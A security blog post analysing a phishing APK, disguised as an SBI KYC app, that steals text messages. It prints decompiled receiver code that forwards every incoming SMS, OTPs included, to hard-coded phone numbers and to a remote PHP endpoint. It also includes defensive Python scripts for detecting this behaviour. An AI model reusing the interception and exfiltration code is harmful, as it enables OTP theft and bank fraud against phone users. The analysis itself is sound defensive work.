SBI Account Will be Suspended Today

Dotworld Technologies
4 min read · Feb 24, 2023

Finally I too got the message from scammers.

You might face financial loss or be scammed if the scammers get hold of your details.

SBI (State Bank of India) or any other legitimate financial institution will never ask you to provide personal information, such as your PAN card details or account information, through an unsolicited message or email.

To be exact, this is the message we received. It is a message from scammers urging us to install the application at the link provided.

Dear Customer your SBI Account Will be Suspended Today Please Update Your Pancard now visit the link install app https://sbl-1-kyc-app[.]web[.]app/SBl-KYC[.]apk

Only last week we informed our co-workers not to click on such links. Today I received it via SMS. And I was happy. Not to install it, but to find out what the application does once it is installed.

Let’s see what the scammers are trying to do when we install the application in the link.

First the link.

It looks like the scammers are using Google's Firebase Hosting (the web.app domain) to host and distribute the application (APK).

We did some quick reverse engineering and found the following.

<uses-sdk android:minSdkVersion="16" android:targetSdkVersion="33"/>
<uses-feature android:name="android.hardware.telephony" android:required="false"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_SMS"/>

First we had a look at the manifest file. It requests permission to receive, read and send SMS (RECEIVE_SMS, READ_SMS, SEND_SMS), along with INTERNET.

<receiver android:name="com.example.myapplication.SmsReceiver" android:permission="android.permission.BROADCAST_SMS" android:enabled="true" android:exported="true">
    <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
    </intent-filter>
</receiver>
<receiver android:name="com.example.myapplication.S1m2s3L4i5s6t7n8e9r0" android:permission="android.permission.BROADCAST_SMS" android:enabled="true" android:exported="true">
    <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
    </intent-filter>
</receiver>

Below that we found two BroadcastReceiver registrations for android.provider.Telephony.SMS_RECEIVED (one of them with the digit-stuffed class name S1m2s3L4i5s6t7n8e9r0). So the app is listening for every SMS our phone receives.
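A static triage check of the kind a defender would run over a decoded manifest before opening a decompiler, added here as an example in Python (it is not code from the post or from the analysed app). It parses a constructed manifest assembled from the fragments quoted above, lists the SMS permissions and every receiver hooked on SMS_RECEIVED, and flags the combination that makes silent forwarding possible: RECEIVE_SMS, an SMS_RECEIVED receiver, and an exit channel (SEND_SMS or INTERNET). The package attribute and the <application> wrapper in the sample are assumed, and the digit-ratio heuristic for odd class names is our own.

```python
"""Static triage of a decoded AndroidManifest.xml for SMS-interception indicators."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed sample, modelled on the manifest fragments quoted in the post.
# The package attribute and the <application> element are assumed; only the
# permissions and receivers shown in the post are reproduced.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.myapplication">
  <uses-sdk android:minSdkVersion="16" android:targetSdkVersion="33"/>
  <uses-feature android:name="android.hardware.telephony" android:required="false"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application>
    <receiver android:name="com.example.myapplication.SmsReceiver"
              android:permission="android.permission.BROADCAST_SMS"
              android:enabled="true" android:exported="true">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name="com.example.myapplication.S1m2s3L4i5s6t7n8e9r0"
              android:permission="android.permission.BROADCAST_SMS"
              android:enabled="true" android:exported="true">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

SMS_PERMISSIONS = {
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
}
SMS_RECEIVED_ACTION = "android.provider.Telephony.SMS_RECEIVED"


def looks_obfuscated(class_name: str) -> bool:
    """Heuristic (ours): a simple class name that is at least 30% digits,
    like S1m2s3L4i5s6t7n8e9r0, is unlikely to be a hand-written identifier."""
    simple = class_name.rsplit(".", 1)[-1]
    if not simple:
        return False
    digits = sum(ch.isdigit() for ch in simple)
    return digits / len(simple) >= 0.3


def triage_manifest(manifest_xml: str) -> dict:
    """Collect SMS permissions and SMS_RECEIVED receivers, and flag the
    combination that makes silent SMS forwarding possible."""
    root = ET.fromstring(manifest_xml)
    permissions = {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}

    sms_receivers = []
    for receiver in root.iter("receiver"):
        actions = {a.get(ANDROID_NS + "name") for a in receiver.iter("action")}
        if SMS_RECEIVED_ACTION in actions:
            sms_receivers.append(receiver.get(ANDROID_NS + "name"))

    # Forwarding needs all three: the app may receive SMS, it has a receiver
    # hooked on SMS_RECEIVED, and it has a way out (SMS and/or network).
    has_exit_channel = bool(
        permissions & {"android.permission.SEND_SMS", "android.permission.INTERNET"}
    )
    suspicious = (
        "android.permission.RECEIVE_SMS" in permissions
        and bool(sms_receivers)
        and has_exit_channel
    )
    return {
        "sms_permissions": sorted(permissions & SMS_PERMISSIONS),
        "sms_receivers": sms_receivers,
        "obfuscated_receivers": [r for r in sms_receivers if looks_obfuscated(r)],
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    for key, value in triage_manifest(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

Point it at the AndroidManifest.xml that apktool decodes from an APK. A flagged result does not prove malice on its own (a legitimate SMS app requests the same permissions); it prioritises the sample for the manual review of the receivers that follows.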

Let's dig further into each receiver.

if (obj2 != null) {
    // Parse the raw PDU into an SmsMessage (only on API 23+; null otherwise)
    SmsMessage smsMessage = Build.VERSION.SDK_INT >= 23 ? SmsMessage.createFromPdu(bArr, (String) obj2) : null;
    Intrinsics.checkExpressionValueIsNotNull(smsMessage, "currentMessage");
    // Forwarding destination: the stored "phoneNumber", else the first hard-coded default
    String string = sharedPreferences.getString("phoneNumber", "+916306015875");
    // The return values of the remaining lookups are discarded
    sharedPreferences.getString("phoneNumber", "+917908459827");
    sharedPreferences.getString("phoneNumber", "+918108060160");
    sharedPreferences.getString("phoneNumber", "+917065860860");
    sharedPreferences.getString("phoneNumber", "+917304499902");
    sharedPreferences.getString("phoneNumber", "+919634224747");
    sharedPreferences.getString("phoneNumber", "+919004676782");
    String displayMessageBody = smsMessage.getDisplayMessageBody();
    // Forward every message except class 0 (flash) SMS to that number
    if (smsMessage.getMessageClass() != SmsMessage.MessageClass.CLASS_0) {
        smsManager.sendTextMessage(string, null, displayMessageBody, null, null);
    } else {
        return;
    }
}

Here is a brief explanation of what each line of code is doing:

  • The first line declares a variable called smsMessage of type SmsMessage. Its value depends on the Android version installed on the device: on Android 23 or above, the createFromPdu method builds an SmsMessage object from a Protocol Data Unit (PDU) byte array (bArr) and a String (obj2); below 23, smsMessage is assigned null.
  • Intrinsics.checkExpressionValueIsNotNull is the Kotlin runtime check that smsMessage is not null (it throws if it is). This ensures the getDisplayMessageBody call later on the variable will not result in a NullPointerException.
  • The next few lines call getString on shared preferences with the key "phoneNumber", passing hard-coded phone numbers as the default values returned if the key is not set. Only the first call's result is stored (in string); the return values of the remaining calls are discarded.
  • The getDisplayMessageBody method gets the message body of the smsMessage object.
  • The getMessageClass method determines the message class of the smsMessage object. If the class is not SmsMessage.MessageClass.CLASS_0, sendTextMessage is called on smsManager to send a text message containing the body of the SMS we received (displayMessageBody) to the phone number stored in the string variable.
  • If the message class is SmsMessage.MessageClass.CLASS_0, the method returns without sending any text message.

Let’s have a look at another receiver.

public void onReceive(Context context, Intent intent) {
    try {
        Bundle extras = intent.getExtras();
        if (extras != null) {
            // One PDU per SMS segment
            for (Object obj : (Object[]) extras.get("pdus")) {
                SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) obj);
                String displayOriginatingAddress = createFromPdu.getDisplayOriginatingAddress();
                String displayMessageBody = createFromPdu.getDisplayMessageBody();
                Toast.makeText(context, "From: " + displayOriginatingAddress, 0).show(); // 0 = Toast.LENGTH_SHORT
                sendSMS(context, displayOriginatingAddress, displayMessageBody);
            }
        }
    } catch (Exception unused) {
        Log.e("Error", "Failed to read SMS!");
    }
}

public void sendSMS(Context context, String str, String str2) {
    // Volley request with method 0 (Request.Method.GET): sender and body travel in the query string
    Volley.newRequestQueue(context).add(new StringRequest(0,
            ("https://stickiest-variety.000webhostapp.com//save_sms0.php?phone=" + str) + "&msg=" + Uri.encode(str2),
            new SmsReceiver$$ExternalSyntheticLambda0(), new SmsReceiver$$ExternalSyntheticLambda1()));
}

Here is a brief explanation of what each line of code is doing:

  • The onReceive method is called when a new SMS is received. It gets the extras from the intent, which contain the SMS message data. If there are extras, it loops through each PDU and creates an SmsMessage object from it. It then gets the sender's phone number and the message body, shows a toast with the sender's phone number, and hands both to the sendSMS method.
  • The sendSMS method uses the Volley library to send an HTTP GET request to a server. It appends the sender's phone number to the URL as a parameter named "phone", and the message body, encoded with Uri.encode, as a parameter named "msg". The whole SMS text therefore ends up in the URL's query string.
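Because the upload is an HTTP GET with the body in the query string, every forwarded SMS, OTP included, is visible in plain text to any egress proxy or web server log on the path. The following added example (Python; not code from the post or from the app) shows how a defender would pick those requests out of a proxy log: it parses constructed log lines whose request URL mirrors the host, path and phone/msg parameter names of the decompiled sendSMS method, and notes whether the leaked body carries an OTP-like digit group. The log format, timestamps, client addresses, OTP value and the XXXXXXXXXX phone placeholder are made up.

```python
"""Spot SMS bodies leaking through HTTP GET query strings in egress logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample proxy log (not from the post). The hostname, path and the
# phone/msg parameter names mirror the request built by the decompiled sendSMS
# method; the timestamps, client addresses, OTP value and the XXXXXXXXXX phone
# placeholder are made up.
SAMPLE_PROXY_LOG = """\
2023-02-24T10:15:01Z 10.0.0.12 GET https://stickiest-variety.000webhostapp.com//save_sms0.php?phone=%2B91XXXXXXXXXX&msg=Your%20OTP%20is%20482913.%20Do%20not%20share%20it. 200
2023-02-24T10:15:07Z 10.0.0.12 GET https://www.example.org/index.html 200
2023-02-24T10:16:44Z 10.0.0.40 GET https://api.example.net/v1/lookup?phone=directory 200
"""

# Both parameter names used by the app's upload request.
EXFIL_PARAMS = {"phone", "msg"}
# OTPs are typically a standalone group of 4 to 8 digits.
OTP_PATTERN = re.compile(r"\b\d{4,8}\b")


def find_sms_exfil(log_text: str) -> list:
    """Return one finding per request whose query string carries both a
    'phone' and a 'msg' parameter, noting whether msg looks like an OTP."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        # Assumed log layout: timestamp client method url status
        timestamp, client, method, url, status = line.split()
        parts = urlsplit(url)
        query = parse_qs(parts.query)
        if not EXFIL_PARAMS <= set(query):
            continue
        message = query["msg"][0]  # parse_qs has already percent-decoded it
        findings.append({
            "time": timestamp,
            "client": client,
            "host": parts.hostname,
            "phone": query["phone"][0],
            "contains_otp": OTP_PATTERN.search(message) is not None,
            "message": message,
        })
    return findings


if __name__ == "__main__":
    for finding in find_sms_exfil(SAMPLE_PROXY_LOG):
        print(finding)
```

The parameter-name match is deliberately narrow to this sample; in practice the same loop would be fed from a SIEM query and the `contains_otp` flag used to prioritise which clients to pull for device review.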

Based on the above findings, the scammers are intercepting incoming SMS and forwarding each one twice: once to their mobile number and once to their server.

Please do not click on the link or download any app from unverified sources.

This blog is only for informational purposes and to educate people about what this kind of application does.

Stay tuned and follow us for more.😉

Written by
Naveen Sakthivel, CTO
Dotworld Technologies Private Limited
https://dotworld.in
